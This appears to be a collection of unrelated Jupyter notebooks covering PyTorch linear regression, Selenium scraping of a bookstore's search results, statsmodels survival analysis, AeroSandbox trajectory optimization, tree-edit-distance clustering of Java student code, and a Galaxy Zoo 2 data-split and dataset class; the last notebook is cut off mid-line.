```
github_jupyter
<a href="https://colab.research.google.com/github/reallygooday/60daysofudacity/blob/master/Linear_Regression2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> Link to Colab Jupyter Notebook: https://colab.research.google.com/drive/19QYWp_lExrN65b6OesWS9NNA7x0fHKmq#scrollTo=KOl9mFXs7ja8 # Deep Learning using PyTorch Implementing Machine Learning based algorithm to train Linear Model to fit a set of data points. Getting comfortable making predictions by using Linear Model. Machine Leraning is the concept of building algorithms that can learn based on experience to detect and predict meaningful patterns. In Supervised Learning, algorithms are trained to make use of labeled data. Once introduced to new input, the algoritms are able to predict a corresponding output. ``` # import relevant Torch Library !pip3 install torch import torch from torch.nn import Linear w = torch.tensor(3.0, requires_grad=True) #weight b = torch.tensor(1.0, requires_grad=True)#bias def forward(x): # forward-function with one argument y =w*x + b return y x =torch.tensor(2) forward(x) x = torch.tensor([[4],[7]]) # making predictins for 4 and 7, two separate inputs forward(x) ``` * 13 is prediction for 4; * 22 is prediction for 7 ``` torch.manual_seed(1) # set a seed for generating random number for the Linear Class model = Linear(in_features =1, out_features=1) # for every single input calculate single ouput print(model.bias, model.weight) # obtain the optimal parameters to fit the data x = torch.tensor([2.0]) # float number # passing x as input # passing multiple input x = torch.tensor([[2.0],[3.3]]) model(x) import torch.nn as nn # Linear Regression Class # creating objects, new instances of Linear Regression Class # class is followed by init method(constructer, initializer) class LR(nn.Module): def __init__(self,input_size,output_size): super().__init__() # template to create custom class self.Linear = nn.Linear(input_size,output_size) def forward(self, x): pred = self.Linear(x) return pred torch.manual_seed(1) model = LR(1,1) print(list(model.parameters())) ``` weight equals 0.5153 bias equals -0.4414 ``` x = torch.tensor([1.0]) # single input, single output print(model.forward(x)) x = torch.tensor([[1.0],[2.0]]) # multiple input, multiple output print(model.forward(x)) ``` # Train model to fit a dataset. ``` import matplotlib.pyplot as plt x = torch.randn(100,1)*10 # returns a tensor filled with random numbers y = x print(x) ``` Each datapoint is characterized by X and Y coordinates. Fitting a linear model into a straight line of data points. ``` x = torch.randn(100,1)*10 y = x # output equals input plt.plot(x.numpy(), y.numpy()) ``` This results in a straight line of datapoints. # Creating noisy dataset. Adding noise to output to each Y value and shift upwards and downwards. Noise will be normally distributed accross the entire range. ``` x = torch.randn(100,1)*10 y = x + 3*torch.randn(100,1) # multiply noise ratio by 3 to make noise reasonably significant plt.plot(x.numpy(), y.numpy(), 'o') plt.ylabel('Y') plt.xlabel('X') class LR(nn.Module): def __init__(self,input_size,output_size): super().__init__() # template to create custom class self.Linear = nn.Linear(input_size,output_size) def forward(self, x): pred = self.Linear(x) return pred torch.manual_seed(1) model = LR(1,1) print(model) print(list(model.parameters())) [w,b] = model.parameters() w1=w[0][0].item() b1=b[0].item() print(w1,b1) # parameters, tensor values [w,b] = model.parameters() print(w,b) w1=w[0][0] b1=b[0] print(w1,b1) def get_params(): return() # parameters, tensor values [w,b] = model.parameters() w1=w[0][0] b1=b[0] print(w1,b1) def get_params(): return(w[0][0].item(), b[0].item()) ``` # Plot Linear Model alongside datapoints. Determine numerical expression for x1 and y1. ``` import numpy as np def plot_fit(title): plt.title = title w1,b1 = get_params() x1 = np.array([-30, 30]) y1 = w1*x1 + b1 plt.plot(x1, y1,'r') plt.scatter(x,y) plt.show() plot_fit('Initial Model') ``` The line doesn't fit data. It would be better to use Gradient Descent Algorithn to adjust parameters. ``` criterion = nn.MSELoss() optimizer = torch.optim.SGD(model.parameters(), lr = 0.01) epochs =100 losses = [] for i in range(epochs): y_pred = model.forward(x) loss = criterion(y_pred, y) print('epochs:', i, 'loss:', loss.item()) losses.append(loss) optimizer.zero_grad() loss.backward() optimizer.step() plot_fit('Trained Model') The Linear Model has been trained to fit training data using gradient descent. ```
github_jupyter
# Python для анализа данных *Алла Тамбовцева, НИУ ВШЭ* дополнения: *Ян Пиле, НИУ ВШЭ* Посмотрим на другие примеры использования `selenium`. **Пример.** Зайдем на сайт книжного магазина и найдем все книги про Python. Загрузим библиотеку, веб-драйвер и откроем страницу в браузере через Python. ``` from selenium import webdriver as wb br = wb.Firefox() # открываем страницу в Chrome в автоматическом режиме br.get("http://www.biblio-globus.ru/") ``` Найдем с помощью CSS Selector'а (*SelectorGadget*) поле для ввода названия книги или автора. ``` field = br.find_element_by_css_selector("input") ``` Сохраним запрос: ``` author = "Python" # переменная author - условность ``` Введем запрос в поле для поиска (`.send_keys`) и подождем чуть-чуть: ``` field.send_keys(author) br.implicitly_wait(2) # подождем пару секунд ``` Теперь найдем кнопку для поиска (значок *лупа* рядом со строкой поиска) через CSS Selector: ``` submit = br.find_element_by_css_selector("#search_submit") ``` Кликнем на нее: ``` submit.click() ``` Сохраним первую страницу с результатами в переменную `page1`. ``` page1 = br.page_source page1 ``` Теперь обработаем эту страницу через `BeautifulSoup`: ``` from bs4 import BeautifulSoup soup1 = BeautifulSoup(page1, 'lxml') ``` Найдем все названия книг на этой странице. По исходному коду можно увидеть, что они имеют тэг `a` с атрибутом `class`, равным `name`: ``` soup1.find_all('a', {'class':'name'}) ``` С помощью списковых включений выберем из ссылок с тэгом `<a>` текст (так мы уже делали, и не раз). ``` books1 = [b.text for b in soup1.find_all('a', {'class':'name'})] books1 ``` Теперь аналогичным образом сгрузим информацию об авторах: ``` authors1 = [a.text for a in soup1.find_all('div', {'class': 'author'})] ``` Сгрузим расположение: ``` place1 = [p.text for p in soup1.find_all('div', {'class':'placement'})] place1 ``` И, конечно, цену: ``` price1 = [p.text for p in soup1.find_all('div', {'class':'title_data price'})] price1 ``` Осталось пройтись по всем страницам, которые были выданы в результате поиска. Для примера перейдем на страницу 2 и на этом остановимся. ``` next_p = br.find_element_by_css_selector('.next_page') next_p.click() ``` Проделаем то же самое, что и с первой страницей. По-хорошему нужно написать функцию, которая будет искать на странице названия книг, их расположение и цену. Но оставим это в качестве задания читателю :) ``` page2 = br.page_source soup2 = BeautifulSoup(page2, 'lxml') books2 = [b.text for b in soup2.find_all('a', {'class':'name'})] author2 = [a.text for a in soup2.find_all('div', {'class': 'author'})] place2 = [p.text for p in soup2.find_all('div', {'class':'placement'})] price2 = [p.text for p in soup2.find_all('div', {'class':'title_data price'})] ``` Расширим списки результатов с первой страницы данными, полученными со второй страницы, используя метод `.extend()`. ``` books1.extend(books2) authors1.extend(books2) place1.extend(place2) price1.extend(price2) ``` Осталось импортировать библиотеку `pandas` и создать датафрейм. ``` import pandas as pd ``` Для разнообразия создадим датафрейм не из списка списков, а из словаря. Ключами словаря будут названия столбцов в таблице, а значениями – списки с сохраненной информацией (названия книг, цены и проч.). ``` df = pd.DataFrame({'book': books1, 'author': authors1, 'placement': place1, 'price': price1}) df.head() ``` Давайте приведем столбец с ценой к числовому типу. Уберем слова *Цена* и *руб*, а потом сконвертируем строки в числа с плавающей точкой. Напишем функцию `get_price()`, ``` def get_price(price): book_price = price.split(' ')[1] # разобьем строку по пробелу и возьмем второй элемент book_price = book_price.replace(',', '.') # заменим запятую на точку price_num = float(book_price) # сконвертируем в float return price_num import re def preis(x): return float('.'.join(re.findall(r'\d+',x))) # проверка get_price(df.price[0]) preis(df.price[0]) ``` Всё отлично работает! Применим функцию к столбцу *price* и создадим новый столбец *nprice*. ``` df['nprice'] = df.price.apply(preis) df.head() ``` Теперь можем расположить книги по цене в порядке возрастания: ``` df.sort_values('nprice') ``` И сохраним всю таблицу в csv-файл: ``` df.to_csv("books.csv") ```
github_jupyter
生存分析是用于分析直到一个或多个事件发生的预期持续时间的统计分支,例如生物有机体中的死亡和机械系统中的失败。本主题被称为可靠性理论和可靠性分析的工程,持续时间分析或持续时间建模在经济学和事件历史分析,在社会学。生存分析试图回答以下问题:在一定时间内存活的人口比例是多少?那些幸存下来的人会以什么样的速度死亡或失败?可以考虑多种死亡原因吗?具体情况或特征如何增加或减少生存的概率? 理论链接: 生存分析(survival analysis)https://www.cnblogs.com/wwxbi/p/6136348.html 生存分析学习笔记https://blog.csdn.net/jaen_tail/article/details/79081954 statsmodels.duration实现了几种处理删失数据的标准方法。当数据由起始时间点和某些感兴趣事件发生的时间之间的持续时间组成时,最常使用这些方法。 目前只处理右侧审查。当我们知道在给定时间t之后发生事件时发生了右删失,但我们不知道确切的事件时间。 **生存函数估计和推理** statsmodels.api.SurvfuncRight类可以被用来估计可以右删失数据的生存函数。 SurvfuncRight实现了几个推理程序,包括生存分布分位数的置信区间,生存函数的逐点和同时置信带以及绘图程序。duration.survdiff函数提供了比较生存分布的检验程序。 **Example** 在这里,我们SurvfuncRight使用flchain研究中的数据创建一个对象 ,该数据可通过R数据集存储库获得。我们只适合女性受试者的生存分布。 ``` import statsmodels.api as sm data = sm.datasets.get_rdataset("flchain", "survival").data df = data.loc[data.sex == "F", :] sf = sm.SurvfuncRight(df["futime"], df["death"]) # 通过调用summary方法可以看出拟合生存分布的主要特征 sf.summary().head() #我们可以获得生存分布的分位数的点估计和置信区间。 #由于在这项研究中只有约30%的受试者死亡,我们只能估计低于0.3概率点的分位数 sf.quantile(0.25) sf.quantile_ci(0.25) ``` 要绘制单个生存函数,请调用plot方法: ``` sf.plot() ``` 由于这是一个包含大量删失的大型数据集,我们可能希望不绘制删失符号: ``` fig = sf.plot() ax = fig.get_axes()[0] pt = ax.get_lines()[1] pt.set_visible(False) #我们还可以为情节添加95%的同时置信带。通常,这些波段仅针对分布的中心部分绘制。 fig = sf.plot() lcb, ucb = sf.simultaneous_cb() ax = fig.get_axes()[0] ax.fill_between(sf.surv_times, lcb, ucb, color='lightgrey') ax.set_xlim(365, 365*10) ax.set_ylim(0.7, 1) ax.set_ylabel("Proportion alive") ax.set_xlabel("Days since enrollment") #在这里,我们在同一轴上绘制两组(女性和男性)的生存函数: gb = data.groupby("sex") ax = plt.axes() sexes = [] for g in gb: sexes.append(g[0]) sf = sm.SurvfuncRight(g[1]["futime"], g[1]["death"]) sf.plot(ax) li = ax.get_lines() li[1].set_visible(False) li[3].set_visible(False) plt.figlegend((li[0], li[2]), sexes, "center right") plt.ylim(0.6, 1) ax.set_ylabel("Proportion alive") ax.set_xlabel("Days since enrollment") ``` 我们可以正式比较两个生存分布survdiff,它实现了几个标准的非参数程序。默认程序是logrank检测: ``` stat, pv = sm.duration.survdiff(data.futime, data.death, data.sex) #以下是survdiff实施的一些其他测试程序 # Fleming-Harrington with p=1, i.e. weight by pooled survival time stat, pv = sm.duration.survdiff(data.futime, data.death, data.sex, weight_type='fh', fh_p=1) # Gehan-Breslow, weight by number at risk stat, pv = sm.duration.survdiff(data.futime, data.death, data.sex, weight_type='gb') # Tarone-Ware, weight by the square root of the number at risk stat, pv = sm.duration.survdiff(data.futime, data.death, data.sex, weight_type='tw') ``` **回归方法** 比例风险回归模型(“Cox模型”)是用于删失数据的回归技术。它们允许以协变量的形式解释事件的时间变化,类似于线性或广义线性回归模型中所做的。这些模型以“风险比”表示协变量效应,这意味着危险(瞬时事件率)乘以给定因子,取决于协变量的值。 ``` import statsmodels.api as sm import statsmodels.formula.api as smf data = sm.datasets.get_rdataset("flchain", "survival").data del data["chapter"] data = data.dropna() data["lam"] = data["lambda"] data["female"] = (data["sex"] == "F").astype(int) data["year"] = data["sample.yr"] - min(data["sample.yr"]) status = data["death"].values mod = smf.phreg("futime ~ 0 + age + female + creatinine + " "np.sqrt(kappa) + np.sqrt(lam) + year + mgus", data, status=status, ties="efron") rslt = mod.fit() print(rslt.summary()) ```
github_jupyter
# Block Move in Fixed Time Here, we look at a problem called "Block Move". Block Move is a very simple optimal control problem defined by Matthew Kelly in the paper *[An Introduction to Trajectory Optimization: How to Do Your Own Direct Collocation](https://epubs.siam.org/doi/10.1137/16M1062569)*. The basics of the problem are this: ----- Suppose we have a block with a unit mass on a frictionless surface; the block can slide forward and backwards along a number line $x$. At $t=0$, the block starts at $x=0$ with velocity $v=0$. At $t=1$, we want the block to have moved to $x=1$ and again be stationary with $v=0$. We are allowed to apply any amount of force $u(t)$ to the block, but we want to find the path that minimizes the amount of "effort" applied. We measure "effort" as the integral $\int_0^1 u(t)^2\ dt$. What should our force input $u(t)$ be? ----- Let's solve the problem. First, we do some boilerplate setup: ``` import aerosandbox as asb import aerosandbox.numpy as np opti = asb.Opti() n_timesteps = 300 mass_block = 1 ``` Then, we define our time vector, our state vectors, and our force vector. ``` time = np.linspace(0, 1, n_timesteps) position = opti.variable( init_guess=np.linspace(0, 1, n_timesteps) # Guess a trajectory that takes us there linearly. ) velocity = opti.derivative_of( position, with_respect_to=time, derivative_init_guess=1, # Guess a velocity profile that is uniform over time. ) force = opti.variable( init_guess=np.linspace(1, -1, n_timesteps), # Guess that the force u(t) goes from 1 to -1 over the time window. n_vars=n_timesteps ) ``` We can't forget to constrain the derivative of velocity to be equal to the acceleration! ``` opti.constrain_derivative( variable=velocity, with_respect_to=time, derivative=force / mass_block, # F = ma ) ``` Now, we compute the amount of effort expended using a numerical integral: ``` effort_expended = np.sum( np.trapz(force ** 2) * np.diff(time) ) opti.minimize(effort_expended) ``` Can't forget to add those boundary conditions! Some notes: * *"Wait, isn't $x=0$ an initial condition, not a boundary condition?"* There is no mathematical difference between *initial conditions* and *boundary conditions*. We use the phrase "boundary conditions" to refer to both. This helps eliminate any confusion between "initial conditions" and "initial guesses". * *"Wait, what's the difference between initial conditions and initial guesses?"* "Initial conditions" are really just boundary conditions that happen to be applied at the boundary $t=0$. "Initial guesses" are our best guess for each of our design variables - basically, our best guess for the optimal trajectory. It is so important that the distinction be understood! Again, we use the "boundary conditions" catch-all rather than "initial conditions" to help reinforce this distinction. Now for those boundary conditions: ``` opti.subject_to([ position[0] == 0, position[-1] == 1, velocity[0] == 0, velocity[-1] == 0, ]) ``` Now, we solve. ``` sol = opti.solve() ``` This actually solves in just one iteration because it is an unconstrained quadratic program. Let's plot what our solution looks like: ``` import matplotlib.pyplot as plt import seaborn as sns fig, ax = plt.subplots(1, 1, figsize=(6.4, 4.8), dpi=200) plt.plot(sol.value(time), sol.value(position)) plt.xlabel(r"Time") plt.ylabel(r"Position") plt.title(r"Position") plt.tight_layout() plt.show() fig, ax = plt.subplots(1, 1, figsize=(6.4, 4.8), dpi=200) plt.plot(sol.value(time), sol.value(velocity)) plt.xlabel(r"Time") plt.ylabel(r"Velocity") plt.title(r"Velocity") plt.tight_layout() plt.show() fig, ax = plt.subplots(1, 1, figsize=(6.4, 4.8), dpi=200) plt.plot(sol.value(time), sol.value(force)) plt.xlabel(r"Time") plt.ylabel(r"Force") plt.title(r"Force") plt.tight_layout() plt.show() ``` That makes sense! We can actually prove optimality of these functions here using calculus of variations; see Appendix B of the Kelly paper for more details.
github_jupyter
``` import numpy as np import pandas as pd import scipy import psycopg2 %matplotlib inline import matplotlib.pyplot as plt import seaborn as sns import os import json from collections import Counter def parse_testdata(path='../data/rainfall-submissions.tsv'): file = open(path,'r') raw = file.readlines() file.close() res = dict() exid = "3c79c115-0f5f-4d8e-b02c-b4b33155a4b3" get_code = lambda data: data["mooc-2017-ohjelmointi"]["osa02-Osa02_16.MarsinLampotilanKeskiarvo"]["/src/MarsinLampotilanKeskiarvo.java"] for line in raw: id = line[:len(exid)] body = json.loads(line[len(exid):]) res[id] = get_code(body) return res def parse_testdata_df(path='../data/rainfall-submissions.tsv'): file = open(path,'r') raw = file.readlines() file.close() ids = [None] * len(raw) code = [None] * len(raw) exid = "3c79c115-0f5f-4d8e-b02c-b4b33155a4b3" get_code = lambda data: data["mooc-2017-ohjelmointi"]["osa02-Osa02_16.MarsinLampotilanKeskiarvo"]["/src/MarsinLampotilanKeskiarvo.java"] for i, line in enumerate(raw): id = line[:len(exid)] body = json.loads(line[len(exid):]) ids[i] = id code[i] = get_code(body) return pd.DataFrame({ "ids": ids, "code": code }) rain = parse_testdata() rain_df = parse_testdata_df() rain_df print(rain['b4df7baf-1ba2-4a67-8b82-dabc5a1a0bb8']) import antlr4 from antlr_local.generated.JavaLexer import JavaLexer from antlr_local.generated.JavaParser import JavaParser from antlr_local.generated.JavaParserListener import JavaParserListener from antlr_local.MyListener import KeyPrinter from antlr_local.TreeListener import TreeListener, Node from antlr_local.java_tokens import tokenTypes, interestingTokenTypes, rareTokenTypes from antlr_local.java_parsers import parse_ast_complete, parse_ast_keywords, parse_ast_modified import pprint from antlr4 import RuleContext from collections import Counter code = rain['b4df7baf-1ba2-4a67-8b82-dabc5a1a0bb8'] code2 = rain['a7970347-f720-472f-9b2d-e4dbdc8c604c'] def parse_tree(code): code_stream = antlr4.InputStream(code) lexer = JavaLexer(code_stream) token_stream = antlr4.CommonTokenStream(lexer) parser = JavaParser(token_stream) tree = parser.compilationUnit() return tree tree = parse_tree(code) tree2 = parse_tree(code2) printer = KeyPrinter() treeListener = TreeListener() walker = antlr4.ParseTreeWalker() walker.walk(printer, tree) walker.walk(treeListener, tree) t1 = treeListener.get_tree() treeListener.reset() walker.walk(treeListener, tree2) t2 = treeListener.get_tree() print(str(t1)) print(str(t2)) print(printer.get_result()) from zss import simple_distance, Node as ZNode def genZssTree(node): n = ZNode(node.label) for c in node.children: n.addkid(genZssTree(c)) return n tz1 = genZssTree(t1) tz2 = genZssTree(t2) simple_distance(tz1, tz2) class Node(object): def __init__(self, parent, label, depth=0): self.label = label self.children = [] self.parent = parent self.depth = depth def addChild(self, node): self.children.append(node) return self def getParent(self): return self.parent def toList(self): return [self.label] + [l for lst in [c.toList() for c in self.children] for l in lst] def __str__(self): n = f'{self.depth}:{self.label}' s = '\n'.join([n]+[str(c) for c in self.children]) padding = ' ' * self.depth return f'{padding} {s}' def __len__(self): return 1 + sum([len(c) for c in self.children]) def getRule(antlrNode, parser): return parser.ruleNames[antlrNode.getRuleIndex()] def getTokenType(n): t = n.getSymbol().type if t in tokenTypes: return tokenTypes[t] return None def generate_complete_tree(parentNode, antlrNode, parser): name = getRule(antlrNode, parser) depth = antlrNode.depth() n = Node(parentNode, name, depth) for child in antlrNode.children: if hasattr(child, 'getRuleIndex'): n.addChild(generate_complete_tree(n, child, parser)) elif hasattr(child, 'getSymbol'): token_type = getTokenType(child) if token_type: n.addChild(Node(parentNode, token_type, depth + 1)) else: print('unknown node') return n def parse_complete_tree(code): code_stream = antlr4.InputStream(code) lexer = JavaLexer(code_stream) token_stream = antlr4.CommonTokenStream(lexer) parser = JavaParser(token_stream) tree = parser.compilationUnit() t = generate_complete_tree(Node(None, 'root', 0), tree, parser) return t t = parse_complete_tree(code) l = t.toList() l from zss import simple_distance, Node as ZNode def getTokenType(n): t = n.getSymbol().type if t in tokenTypes: return tokenTypes[t] print(f'unknown {t}') return f'unknown {t}' def generate_tree(parentNode, antlrNode): name = parser.ruleNames[antlrNode.getRuleIndex()] depth = antlrNode.depth() n = Node(parentNode, name, depth) for child in antlrNode.children: if hasattr(child, 'getRuleIndex'): n.addChild(generate_tree(n, child)) elif hasattr(child, 'getSymbol'): n.addChild(Node(parentNode, getTokenType(child), depth + 1)) else: print('unknown node') return n def generate_ztree(parentNode, antlrNode): name = parser.ruleNames[antlrNode.getRuleIndex()] depth = antlrNode.depth() n = ZNode(name) for child in antlrNode.children: if hasattr(child, 'getRuleIndex'): n.addkid(generate_tree(n, child)) elif hasattr(child, 'getSymbol'): n.addkid(ZNode(getTokenType(child))) else: print('unknown node') return n root = Node(None, 'root', 0) t = generate_tree(root, tree) t2 = generate_tree(root, tree2) tz1 = generate_ztree(ZNode('root'), tree) tz2 = generate_ztree(ZNode('root'), tree2) len(t) simple_distance(tz1, tz2) print(str(t)) print(rain['b4df7baf-1ba2-4a67-8b82-dabc5a1a0bb8']) ``` # Model ``` import numpy as np import pandas as pd from sklearn.feature_extraction.text import CountVectorizer from sklearn.feature_extraction.text import TfidfTransformer from sklearn.metrics.pairwise import cosine_similarity from sklearn.manifold import TSNE from sklearn.decomposition import TruncatedSVD from sklearn import manifold from sklearn.cluster import DBSCAN, OPTICS, KMeans import hdbscan import umap import antlr4 from antlr4 import RuleContext from antlr_local.generated.JavaLexer import JavaLexer from antlr_local.generated.JavaParser import JavaParser from antlr_local.generated.JavaParserListener import JavaParserListener from antlr_local.MyListener import KeyPrinter from antlr_local.TreeListener import TreeListener, Node from antlr_local.java_tokens import tokenTypes, interestingTokenTypes, rareTokenTypes from antlr_local.java_parsers import parse_ast_complete, parse_ast_keywords, parse_ast_modified from antlr_local.java_parsers import parse_ast_complete, parse_ast_keywords, parse_ast_modified from zss import simple_distance, Node as ZNode def parse_testdata(path='../data/rainfall-submissions.tsv'): file = open(path,'r') raw = file.readlines() file.close() res = dict() exid = "3c79c115-0f5f-4d8e-b02c-b4b33155a4b3" get_code = lambda data: data["mooc-2017-ohjelmointi"]["osa02-Osa02_16.MarsinLampotilanKeskiarvo"]["/src/MarsinLampotilanKeskiarvo.java"] for line in raw: id = line[:len(exid)] body = json.loads(line[len(exid):]) res[id] = get_code(body) return res def counts_to_id_dict(ids, counts): d = {} for i, c in enumerate(counts): if None in c: c.pop(None) if len(c) != 0: d[ids[i]] = dict(c) return d def create_clusters(labels, submissionIds): res = {} for c in set(labels): res[c] = [submissionIds[idx] for idx, label in enumerate(labels) if label == c] return res def genZssTree(node): n = ZNode(node.label) for c in node.children: n.addkid(genZssTree(c)) return n def parse_to_tree(code): code_stream = antlr4.InputStream(code) lexer = JavaLexer(code_stream) token_stream = antlr4.CommonTokenStream(lexer) parser = JavaParser(token_stream) tree = parser.compilationUnit() treeListener = TreeListener() walker = antlr4.ParseTreeWalker() walker.walk(treeListener, tree) t = genZssTree(treeListener.get_tree()) return t def parse_ast(codeList): return [parse_to_tree(c) for c in codeList] def cluster_dist_matrix(dist_matrix, clustering_params): params = clustering_params or {} name = params.get('name') if name == 'DBSCAN' or name is None: min_samples = params.get('min_samples') or 5 eps = params.get('eps') or 0.5 metric = 'precomputed' dbscan = DBSCAN(min_samples=min_samples, metric=metric, eps=eps).fit(dist_matrix) return dbscan.labels_ elif name == 'HDBSCAN': min_cluster_size = params.get('min_cluster_size') or 2 min_samples = params.get('min_samples') or 5 metric = 'precomputed' show_linkage_tree = params.get('show_linkage_tree') or False clusterer = hdbscan.HDBSCAN( min_cluster_size=min_cluster_size, min_samples=min_samples, metric=metric, gen_min_span_tree=show_linkage_tree ) clusterer.fit(dist_matrix) #plt.figure(3, figsize=(24,8)) #clusterer.single_linkage_tree_.plot(cmap='viridis', colorbar=True) return clusterer.labels_ elif name == 'OPTICS': min_samples = params.get('min_samples') or 5 max_eps = params.get('max_eps') or np.inf if int(max_eps) == -1: max_eps = np.inf metric = 'precomputed' optics = OPTICS(min_samples=min_samples, metric=metric, max_eps=max_eps).fit(dist_matrix) return optics.labels_ elif name == 'KMeans': n_clusters = params.get('k_clusters') or 8 kmeans = KMeans(n_clusters=n_clusters).fit(dist_matrix) return kmeans.labels_ else: raise ValueError(f'cluster_dist_matrix(): Unknown clustering method name: {name}') def reduce_to_2d(tfidf, dim_visualization_params={}): params = dim_visualization_params or {} name = params.get('name') if name == 'UMAP': n_neighbors = params.get('n_neighbors') or 30 min_dist = params.get('min_dist') or 0.0 return umap.UMAP( n_components=2, n_neighbors=n_neighbors, min_dist=min_dist, ).fit_transform(tfidf) else: perplexity = params.get('perplexity') or 30 svd_n_components = params.get('svd_n_components') matrix = tfidf if svd_n_components is not None: matrix = TruncatedSVD( n_components=svd_n_components, random_state=0 ).fit_transform(tfidf) return TSNE( n_components=2, perplexity=perplexity ).fit_transform(matrix) def run_ted(submissionIds, codeList, token_set='modified', random_seed=-1, clustering_params={}, dim_visualization_params={}): documents = len(codeList) df = pd.DataFrame({ "trees": parse_ast(codeList), "ids": submissionIds }) if random_seed != -1: np.random.seed(random_seed) return df import psycopg2 from dotenv import load_dotenv import os import json load_dotenv() POSTGRES_HOST = os.getenv("DB_HOST") POSTGRES_PORT = os.getenv("DB_PORT") POSTGRES_DB = os.getenv("DB_NAME") POSTGRES_USER = os.getenv("DB_USER") POSTGRES_PASSWORD = os.getenv("DB_PASSWORD") conn = psycopg2.connect(host=POSTGRES_HOST, port=POSTGRES_PORT, database=POSTGRES_DB, user=POSTGRES_USER, password=POSTGRES_PASSWORD) cur = conn.cursor() class NumpyEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, np.ndarray): return obj.tolist() return json.JSONEncoder.default(self, obj) def query_many(query): cur.execute(query) return cur.fetchall() def cluster_submissions(courseId, exerciseId): rows = query_many(f""" SELECT submission_id, code FROM submission WHERE course_id = {courseId} AND exercise_id = {exerciseId} """) submissionIds = [r[0] for r in rows] codeList = [r[1] for r in rows] token_set = 'modified' random_seed = 1 clustering_params = { 'name': 'DBSCAN', 'min_cluster_size': 2, 'k_clusters': 3 } dim_visualization_params = { 'name': 'TSNE', 'perplexity': 30 } ted_result = run_ted(submissionIds, codeList, token_set, random_seed, clustering_params, dim_visualization_params) return { "ted": ted_result } res = cluster_submissions(2, 4) res df = res['ted'] df.head(5) import math def distance_matrix(pattern): # to get the side length, solve for n where len(pattern) = n*(n + 1)/2 (triangular number formula) side_length = (int(math.sqrt(1 + 8 * len(pattern))) - 1) // 2 + 1 assert (side_length * (side_length - 1)) // 2 == len(pattern), "Pattern length must be a triangular number." # create the grid grid = [[0] * side_length for i in range(side_length)] # fill in the grid position = 0 for i in range(0, side_length - 1): for j in range(0, side_length - 1 - i): element = pattern[position]; position += 1 grid[i][i + j + 1] = element # fill in the upper triangle grid[i + j + 1][i] = element # fill in the lower triangle return grid distance_matrix(np.array([1,2,3,4,5,6,7,8,9,10])) import itertools import multiprocessing from functools import partial import time def f(treePair): return simple_distance(treePair[0], treePair[1]) def fast_ted(df): cores = multiprocessing.cpu_count() -1 or 1 print(f'Running fast_ted with {cores} cores') before = time.time() trees = list(itertools.combinations(df['trees'], 2)) p = multiprocessing.Pool(cores) arr = p.map(f, trees) after = time.time() print('Time spent ' + str(after - before)) dmat = distance_matrix(arr) return np.array(dmat) dist_mat = fast_ted(df) np.save('ted_dist_matrix.npy', dist_mat) dist_mat = np.array(distance_matrix(dist_mat2)) dist_mat clustering_params = { 'name': 'HDBSCAN', 'min_cluster_size': 2, 'k_clusters': 3 } labels = cluster_dist_matrix(dist_mat, clustering_params) labels X_reduced = TruncatedSVD(n_components=30, random_state=0).fit_transform(dist_mat) dim_visualization_params = { 'name': 'TSNE', 'perplexity': 30 } X_embedded = reduce_to_2d(X_reduced, dim_visualization_params) submissionIds = res['ted']['ids'].values clusters = create_clusters(labels, submissionIds) coordinates = [{ 'id': submissionIds[i], 'x': d[0], 'y': d[1], 'cluster': labels[i] } for (i, d) in enumerate(X_embedded)] import matplotlib.pyplot as plt import seaborn as sns cluster = [x['cluster'] for x in coordinates] plt.figure(3, figsize=(10,6)) for i, c in enumerate(np.unique(cluster)): x = [x['x'] for x in coordinates if x['cluster'] == c] y = [x['y'] for x in coordinates if x['cluster'] == c] plt.scatter(x, y, marker="o", cmap='jet', label=c) plt.legend(loc='center left', bbox_to_anchor=(1, 0.5)) plt.show() plt.figure(3, figsize=(10,6)) plt.imshow(dist_mat, zorder=2, cmap='Blues', interpolation='nearest') plt.colorbar() plt.show() ```
github_jupyter
#### *** Adjust the path parameter to user local catalog location.*** ``` # Local directory path for the galaxy zoo 2 catalog dir_cat = "/home/hhg/Research/galaxyClassify/catalog/galaxyZoo/zoo2/" ``` ## ------------ start ------------ ``` import numpy as np import pandas as pd import matplotlib.pyplot as plt %config InlineBackend.figure_format='retina' df = pd.read_csv(dir_cat+'gz2_all_v2.csv') df df.groupby(['label_8']).size() ``` ## data_split ``` file_csv = dir_cat+'gz2_all_v2.csv' f_train = 0.64 f_valid = 0.16 f_test = 0.20 seed = 3 # import sys # sys.path.append('../galaxyZooNet/') # from datasets import data_split import pandas as pd from sklearn.model_selection import train_test_split def data_split(file_csv, f_train=0.64, f_valid=0.16, f_test=0.20, random_state=None, stats=False, label_tag='label_8'): '''train-valid-test splits Args: file_csv (str) : path to the full catalog csv file f_train, f_valid, f_test : fractions of training, validation, test samples stats (bool): display splitting statistics if True Returns: df_train (pd.dataframes) : splitted training sample df_valid (pd.dataframes) : validation df_test (pd.dataframes) : test ''' assert f_train + f_valid + f_test == 1, 'fractions have to sum to 1.' df = pd.read_csv(file_csv) df_train, df_temp = train_test_split(df, train_size=f_train, random_state=random_state) relative_f_valid = f_valid/(f_valid+f_test) df_valid, df_test = train_test_split(df_temp, train_size=relative_f_valid, random_state=random_state) if stats: df_stats=df.groupby([label_tag])[label_tag].agg('count').to_frame('count').reset_index() df_stats['full'] = df_stats['count']/df_stats['count'].sum() df_stats['train'] = df_train.groupby([label_tag]).size()/df_train.groupby([label_tag]).size().sum() df_stats['valid'] = df_valid.groupby([label_tag]).size()/df_valid.groupby([label_tag]).size().sum() df_stats['test'] = df_test.groupby([label_tag]).size()/df_test.groupby([label_tag]).size().sum() ax = df_stats.plot.bar(x=label_tag, y=['full', 'train', 'valid', 'test'], rot=0) ax.set_ylabel('class fraction') return df_train.reset_index(drop=True), df_valid.reset_index(drop=True), df_test.reset_index(drop=True) df_train, df_valid, df_test = data_split(file_csv, f_train, f_valid, f_test, random_state=seed, stats=True) df_train ``` ## GalaxyZooDataset ``` # import sys # sys.path.append('../galaxyZooNet/') # from datasets import GalaxyZooDataset import os from PIL import Image from torch.utils.data import Dataset class GalaxyZooDataset(Dataset): '''Galaxy Zoo 2 image dataset Args: dataframe : pd.dataframe, outputs from the data_split function e.g. df_train / df_valid / df_test dir_image : str, path where galaxy images are located label_tag : str, class label system to be used for training e.g. label_tag = 'label_8' / 'label_3' ''' def __init__(self, dataframe, dir_image, label_tag='label1', transform=None): self.df = dataframe self.transform = transform self.dir_image = dir_image self.label_tag = label_tag def __getitem__(self, index): galaxyID = self.df.iloc[[index]].galaxyID.values[0] file_img = os.path.join(self.dir_image, str(galaxyID) + '.jpg') image = 